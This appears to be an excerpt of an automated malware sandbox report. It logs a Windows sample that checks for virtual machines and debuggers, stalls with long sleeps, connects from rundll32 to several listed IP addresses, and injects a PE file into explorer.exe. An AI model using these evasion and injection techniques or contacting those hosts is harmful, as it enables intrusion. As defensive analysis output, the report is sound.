                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,
                      Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,
                      Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 5001
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 4879
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 468
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8936
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 694
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 672
                      Source: C:\Windows\System32\rundll32.exeAPI coverage: 2.5 %
                      Source: C:\Windows\System32\loaddll64.exe TID: 6660Thread sleep time: -120000s >= -30000s
                      Source: C:\Windows\System32\rundll32.exe TID: 7324Thread sleep count: 5001 > 30
                      Source: C:\Windows\System32\rundll32.exe TID: 7324Thread sleep time: -300060000s >= -30000s
                      Source: C:\Windows\System32\rundll32.exe TID: 7324Thread sleep count: 4879 > 30
                      Source: C:\Windows\System32\rundll32.exe TID: 7324Thread sleep time: -292740000s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 7704Thread sleep time: -224000s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 7728Thread sleep time: -46800s >= -30000s
                      Source: C:\Windows\explorer.exe TID: 7704Thread sleep time: -8936000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800192B8 FindFirstFileExW,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A8BA8 FindFirstFileW,FindNextFileW,LoadLibraryW,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013ADCE0 FindFirstFileW,
                      Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000
                      Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000
                      Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000
                      Source: explorer.exe, 00000016.00000000.1849178409.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: VMware
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
                      Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                      Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: rundll32.exe, 00000012.00000002.2938154508.0000029211558000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: explorer.exe, 00000016.00000000.1849178409.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                      Source: explorer.exe, 00000016.00000002.2940539964.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                      Source: Amcache.hve.9.drBinary or memory string: vmci.sys
                      Source: explorer.exe, 00000016.00000000.1849178409.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: explorer.exe, 00000016.00000000.1849178409.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                      Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                      Source: explorer.exe, 00000016.00000002.2942821965.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                      Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\explorer.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800118B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000D1F4 GetLastError,IsDebuggerPresent,OutputDebugStringW,
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001AC34 GetProcessHeap,
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800118B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000E470 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000D638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 138.124.183.215 443
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 3.69.236.35 443
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 91.194.11.183 443
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 54.175.181.104 443
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 95.164.68.73 443
                      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.16.155 443
                      Allocates memory in foreign processes
                      Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 13A0000 protect: page execute and read and write
                      Contains functionality to inject threads in other processes
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_3_00007DF4F0240100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000000026E7A1370 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 13A0000
                      Injects a PE file into a foreign processes
                      Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 13A0000 value starts with: 4D5A
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\rundll32.exeMemory written: PID: 2580 base: 13A0000 value: 4D
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\System32\rundll32.exeThread register set: target process: 6516
